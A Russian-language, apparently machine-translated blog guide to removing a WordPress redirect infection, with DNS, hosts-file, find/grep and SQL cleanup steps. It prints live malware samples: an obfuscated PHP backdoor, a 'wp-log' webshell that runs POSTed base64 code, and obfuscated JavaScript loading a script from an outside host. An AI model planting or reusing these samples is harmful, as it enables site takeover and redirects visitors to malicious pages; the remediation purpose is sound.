Fix Redirect WordPress Hack 2023 (Virus Redirect)

WordPress это определенно самая используемая платформа CMS (Content Management System) как для блогов, так и для стартовых интернет-магазинов (с модулем WooCommerce), что делает его наиболее уязвимым для компьютерных атак (взломов). Одна из наиболее часто используемых хакерских операций направлена ​​на перенаправление взломанного веб-сайта на другие веб-страницы. Redirect WordPress Hack 2023 — это относительно новое вредоносное ПО, которое перенаправляет весь сайт на спам-страницы или, в свою очередь, может заразить компьютеры пользователей.

Если ваш сайт разработан на WordPress перенаправляется на другой сайт, то он, скорее всего, стал жертвой уже известного взлома перенаправления.

В этом руководстве вы найдете необходимую информацию и полезные советы, с помощью которых вы сможете обезвредить сайт, зараженный редиректом. WordPress Hack (Virus Redirect). Через комментарии можно получить дополнительную информацию или попросить о помощи.

Обнаружение вируса, перенаправляющего сайты WordPress

Внезапное и необоснованное снижение посещаемости сайта, уменьшение количества заказов (в случае интернет-магазинов) или доходов от рекламы — первые признаки того, что что-то не так. Обнаружение »Redirect WordPress Hack 2023(Вирусное перенаправление) также может выполняться «визуально», когда вы открываете веб-сайт и перенаправляетесь на другую веб-страницу.

Исходя из опыта, большинство веб-вредоносных программ совместимы с интернет-браузерами: Chrome, Firefox, Edge, Opera. Если вы пользователь компьютера Mac, эти вирусы толком не видны в браузере Safari. Система безопасности от Safari молча блокировать эти вредоносные скрипты.

Что делать, если ваш сайт заражен Redirect WordPress Hack

Я надеюсь, что первый шаг — не паниковать и не удалять сайт. Даже зараженные или вирусные файлы не следует удалять на первых порах. Они содержат ценную информацию, которая может помочь вам понять, где находится нарушение безопасности и что повлияло на вирус. Метод работы.

Закройте сайт для публики.

Как закрыть вирусный сайт для посетителей? Самый простой — использовать диспетчер DNS и удалить IP-адрес для «A» (доменное имя) или определить несуществующий IP-адрес. Таким образом, посетители сайта будут защищены от этого redirect WordPress hack что может привести их на веб-страницы с вирусами или спамом.

Если вы используете CloudFlare как менеджер DNS, вы входите в учетную запись и удаляете записи DNS "A” для доменного имени. Таким образом, пораженный вирусом домен останется без IP-адреса, и к нему больше не будет доступа из Интернета.

Вы копируете IP-адрес веб-сайта и «маршрутизируете» его так, чтобы только вы могли получить к нему доступ. С вашего компьютера.

Как изменить реальный IP сайта на компьютере Windows?

Этот метод часто используется для блокировки доступа к определенным веб-сайтам путем редактирования файла «hosts».

1. Вы открываете Notepad или другой текстовый редактор (с правами administrator) и отредактируйте файл "hosts". Это находится в:

C:\Windows\System32\drivers\etc\hosts

2. В файле «hosts» добавьте «route» к реальному IP-адресу вашего сайта. IP удален выше из диспетчера DNS.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Сохраните файл и откройте веб-сайт в браузере.

Если веб-сайт не открывается, и вы не сделали ничего неправильного в файле «hosts», скорее всего, это кеш DNS.

Чтобы очистить кеш DNS в операционной системе Windows, открыть Command Prompt, где вы запускаете команду:

ipconfig /flushdns

Как изменить реальный IP сайта на компьютере Mac / MacКнига?

Для пользователей компьютеров Mac несколько проще изменить реальный IP-адрес веб-сайта.

1. Откройте утилиту Terminal.

2. Запустите командную строку (для запуска требуется системный пароль):

sudo nano /etc/hosts

3. То же, что и для компьютеров Windows, добавьте реальный IP домена.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Сохраните изменения. Ctrl+X (y).

После того, как вы «маршрутизируете», вы единственный человек, который может получить доступ к зараженному веб-сайту с помощью Redirect WordPress Hack.

Полное резервное копирование сайта — файлы и база данных

Даже если он заражен «redirect WordPress hack», рекомендуется сделать общую резервную копию всего сайта. Файлы и база данных. Возможно, вы также можете сохранить локальную копию обоих файлов из public / public_html а также базу данных.

Идентификация зараженных файлов и измененных Redirect WordPress Hack 2023

Основные целевые файлы WordPress имеются index.php (в корне), header.php, index.php şi footer.php темы WordPress ресурсы. Вручную проверьте эти файлы и определите вредоносный код или сценарий вредоносного ПО.

В 2023 году вирус «Redirect WordPress Hack" Путин index.php код вида:

(Я не рекомендую запускать эти коды!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Расшифровано, это вредоносный скрипт в основном это следствие заражения сайта WordPress. Это не сценарий вредоносного ПО, это сценарий, который позволяет перенаправить зараженную веб-страницу. Если мы расшифруем скрипт выше, мы получим:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Чтобы идентифицировать все файлы на сервере, содержащие этот код, хорошо иметь доступ SSH на сервер для запуска проверки файлов и командных строк управления на Linux.

Связанный: Как узнать, заражен ваш блог или нет, с помощью Google Search , (WordPress Вирус)

Ниже приведены две команды, которые определенно полезны для идентификации недавно измененных файлов и файлов, содержащих определенный код (строку).

Как ты видишь на Linux Файлы PHP изменились за последние 24 часа или в какой-то другой период времени?

Заказ "find” очень прост в использовании и позволяет настроить период времени, путь для поиска и тип файлов.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

В выводе вы получите информацию о дате и времени модификации файла, разрешениях на запись/чтение/выполнение (chmod) и к какой группе/пользователю он принадлежит.

Если вы хотите проверить больше дней назад, измените значение "-mtime -1” или используйте “-mmin -360за минуты (6 часов).

Как искать код (строку) внутри файлов PHP, Java?

Командная строка «найти», которая позволяет быстро найти все файлы PHP или Java, содержащие определенный код, выглядит следующим образом:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Команда будет искать и отображать файлы .php şi .js содержащий "uJjBRODYsU».

С помощью двух приведенных выше команд вы очень легко узнаете, какие файлы были недавно изменены, а какие содержат вредоносный код.

Удаляет вредоносный код из измененных файлов без ущерба для правильного кода. В моем сценарии вредоносное ПО было размещено до открытия <head>.

При выполнении первой команды «найти» очень возможно обнаружить на сервере новые файлы, которые не принадлежат вам. WordPress ни положить туда вами. Файлы, относящиеся к типу вируса Redirect WordPress Hack.

В исследованном мной сценарии файлы вида «wp-log-nOXdgD.php". Это «спавновые» файлы, которые также содержат вредоносный код, используемый вирусом для перенаправления.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Назначение файлов типа "wp-log-*” заключается в распространении вируса перенаправления на другие веб-сайты, размещенные на сервере. Это вредоносный код типа «webshell” состоит из основной раздел (в котором определены некоторые зашифрованные переменные) и o секция исполнения через который злоумышленник пытается загрузить и выполнить вредоносный код в системе.

Если есть переменная POST по имени 'bh' и его зашифрованное значение MD5 равно "8f1f964a4b4d8d1ac3f0386693d28d03", то появляется скрипт для записи зашифрованного содержимого base64 другой переменной с именем 'b3' во временном файле, а затем пытается включить этот временный файл.

Если есть переменная POST или GET по имени 'tick', скрипт ответит значением MD5 строки "885».

Чтобы идентифицировать все файлы на сервере, содержащие этот код, выберите общую строку, затем выполните команду «find(аналогично предыдущему). Удалите все файлы, содержащие этот вредоносный код..

Уязвимость безопасности, использованная Redirect WordPress Hack

Скорее всего, этот редирект-вирус попадает через эксплуатация пользователя-администратора WordPress или путем определения уязвимый плагин который позволяет добавлять пользователей с привилегиями administrator.

Для большинства сайтов, построенных на платформе WordPress возможно редактирование файлов темы или плагиначерез административный интерфейс (Dashboard). Таким образом, злоумышленник может добавить вредоносный код в файлы темы для генерации скриптов, показанных выше.

Пример такого вредоносного кода:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript указано в шапке темы WordPress, сразу после открытия этикетки <head>.

Расшифровать этот JavaScript довольно сложно, но очевидно, что он запрашивает другой веб-адрес, откуда он, скорее всего, извлекает другие скрипты для создания файлов.wp-log-*», о которых я говорил выше.

Найдите и удалите этот код из всех файлов PHP затронутый.

Насколько я мог судить, этот код был добавлено вручную новым пользователем с правами администратора.

Итак, чтобы предотвратить добавление вредоносного ПО с панели инструментов, лучше всего отключить опцию редактирования. WordPress Темы/плагины из панели управления.

Отредактируйте файл wp-config.php и добавьте строки:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

После внесения этого изменения ни один пользователь WordPress вы больше не сможете редактировать файлы с панели инструментов.

Проверить пользователей с ролью Administrator

Ниже приведен SQL-запрос, который можно использовать для поиска пользователей с ролью administrator на платформе WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Этот запрос вернет всех пользователей в таблице wp_users кто отвел роль administrator. Запрос также делается для таблицы wp_usermeta искать в мета'wp_capabilities', который содержит информацию о ролях пользователей.

Другой метод состоит в том, чтобы идентифицировать их по: Dashboard → Users → All Users → Administrator. Однако существуют методы, с помощью которых пользователь может быть скрыт на панели Dashboard. Итак, лучший способ увидеть пользователей»Administrator"В WordPress это команда SQL выше.

В моем случае я идентифицировал в базе данных пользователя с именем "wp-import-user". Довольно показательно.

Также отсюда можно увидеть дату и время пользователя WordPress был создан. Идентификатор пользователя также очень важен, поскольку он выполняет поиск в журналах сервера. Таким образом, вы можете видеть всю активность этого пользователя.

Удалить пользователей с ролью administrator что вы не знаете, то изменить пароли всем административным пользователям. Редактор, Автор, Administrator.

Изменить пароль пользователя базы данных SQL пострадавшего веб-сайта.

После выполнения этих действий веб-сайт можно перезапустить для всех пользователей.

Имейте в виду, однако, что то, что я представил выше, является одним из, возможно, тысяч сценариев, в которых веб-сайт заражен Redirect WordPress Hack в 2023 году.

Если ваш сайт был заражен и вам нужна помощь или у вас есть какие-либо вопросы, раздел комментариев открыт.